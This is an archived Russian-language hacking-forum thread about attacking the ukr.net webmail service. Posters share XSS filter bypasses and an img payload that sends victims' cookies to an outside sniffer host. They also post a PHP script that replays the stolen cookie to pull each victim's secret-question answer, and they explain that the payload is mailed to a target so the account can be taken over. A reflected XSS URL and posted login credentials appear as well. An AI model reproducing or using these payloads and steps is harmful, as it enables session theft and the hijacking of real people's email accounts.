Просмотр полной версии : ukr.net как?
www.ukr.net
Считываем ответ на секретный вопрос
<embed src=javasc
но как? и куда его пихать, расжите плиз, очень надо! =)
ВЫКЛАДЫВАЙТЕ СРАЗУ ТЕСТОВЫЕ ЛОГИН/ПАРОЛЬ!
Регистрация нового ящика доступна только с территории Украины.
То что ты выложил - по всей видимости кусок Xss. Почему не до конца? Конкретнее без доступа к ящику сказать трудно, а работать на диал апе через украинские прокси мне не в прикол.
Dronga
Логин - antichat@ukr.net
Пароль - abcde
Grema
Виложы до конца код!
я его отсюда взял http://antichat.ru/txt/hmail/
полный код
<embed src=javascript:this.wav>
www.ukr.net
Считываем ответ на секретный вопрос
<embed src=javasc
но как? и куда его пихать, расжите плиз, очень надо! =)
Дружище...Если ты его там взял то по ходу и прочитать должен был все...
Там все доходчиво описано...
Читай еще и еще и еще раз.
Пока не поймешь.
Спасибо NeMiNeM за тестовые логин/пароль, надеюсь автор темы не забудет повысить ему репутацию.
Теперь по делу.
На исследования ушло ровным счетом 7 минут. Диагноз:
Фильтр чем-то напоминает тот, что чтоит на mail.ru (ранние версии). Пропускает закодированное javascript в левых тегах. Обходящая конструкция очень стандартна. Вот рабочий пример:
<img src=javascript:alert('ANTICHAT.RU');>(javascript в ASCII)
В общем, полноценная активная xss в теле письма найдена.
Половина дела есть. Теперь смотрим что используется для авторизации. Сервер дал мне куки. В настройках я увидел отключенную опцию на запрет паралельных сессий, то есть на IP сервер по умолчанию не смотрит.
В дополнение ко всему мною были отмечены следущие особенности:
В настройках, в некоторых интересных местах не запрашивается пароль на сохранение изменений. Выводы делайте сами. На страничке Личная информация для antichat@ukr.net секретный вопрос и ответ на него не закрыты звездочками (!), то есть ящик элементарно "угоняется".
В общем, простор для творчества очень широкий.
Я бы тебе всё с удовольствием расписал от и до, но к сожалению в инете у меня осталось времени 8 минут. И те я трачу на тебя.. :cool:
Кстати, приведенный тобой код, тоже по идее должен работать (если только embed не фильтруется).
Актуально под IE6 и Opera 8.51 (Другие не пробовал)
ну а если нужно захватить канал на irc а чел в ящик незаглядует уже более года ??? что делать??
PinkPanther
05.01.2006, 02:51
Гы, у мну даж стать хде-то на винте статья пылится по данной теме....Дело это было еще в начале декабря, не знаю как сейчас, может уже и парсится.<img src="http://privatesniff/1.gif"style="background:white (http://privatesniff/1.gif) url(javascript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)"> <?
$query=$_SERVER["QUERY_STRING"];
$query=urldecode($query);
$header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0\r\n";
$header.="Referer: http://e.ukr.net\r\n";
$header.="Cookie: ".$query."\r\n";
$header.="Host: e.ukr.net\r\n\r\n";
$fp=fsockopen("e.ukr.net", 80);
fwrite($fp, $header);
$dt="";
while (!feof($fp))
$dt.=fread($fp, 1024);
$pass1=strpos($dt,'Password_Answer')+24;
$pass2=strpos($dt,'" size="40"><br><br></td>');
$length_pass=$pass2-$pass1;
$password=substr($dt,$pass1,$length_pass);
$f1=Fopen("password.html","a");
fwrite($f1,"$password<br /><hr>");
fclose($f1);
fclose($fp);
?>
Так же, если при авторизации поставить галочку "Помнить пароль", то можно использовать и обічній сниффер, ибо нам в лог упадет пароль в чистом виде.
обясните плиз нешарящему, куда энто дело пихать?
обясните плиз нешарящему, куда энто дело пихать?
это посылаешь на мыло в письме жертве
<img src="http://privatesniff/1.gif"style="background:white url(javascript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)">
а код php сюда
_http:// privatesniff/s.php сюда
Неплохо мы тут этот ukr.net разнесли) Хохлы.. В следующий раз сразу на наши условия соглашаться будут =) Хорошая тема. PinkPanther респект, но зря так выложил)
а код php сюда
_http:// privatesniff/s.php сюда
как? :confused: я абсолютно нешарю, но очень хочу научится
<img src="http://privatesniff/1.gif"style="background:white url(javascript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)">
то куда потом призодит отчет, на моё мло?
ZiM: забей.
<img src= ... "> уже не проходит.. Прикрыли.
Нужно искать новые уязвимости...
жаль так хотелось мыло на нашем родном сервере хакнуть(
Угу, по-моему они прикрыли дыру, когда только Dronga выложил активную хсс и код алерта... Но я думаю там ещё можно покопатся и что-нибудь найти ;)
Jonathan Allen
07.01.2006, 20:01
<img src="http://privatesniff/1.gif"style="background:white url(javascript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)">
Можно об этом по-подробнее? Потому, что на одном из интересующих меня операторов проходит
Вот рабочая XSS:
<img src=JaVaScRiPt:alert()>
Слово JaVaScRiPt написано разным регистром
Создайте ктонибудь почту на ukr.net
пожалуйста....
echobyte
24.05.2008, 17:02
Создайте ктонибудь почту на ukr.net
пожалуйста....
PM
BlackPanther
23.04.2009, 14:08
<XXS> passive
http://freemail.ukr.net/q/reg?lang=en&service=%22%3E%3Cscript%3Ealert(/BlackPanther/)%3C/script%3E
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot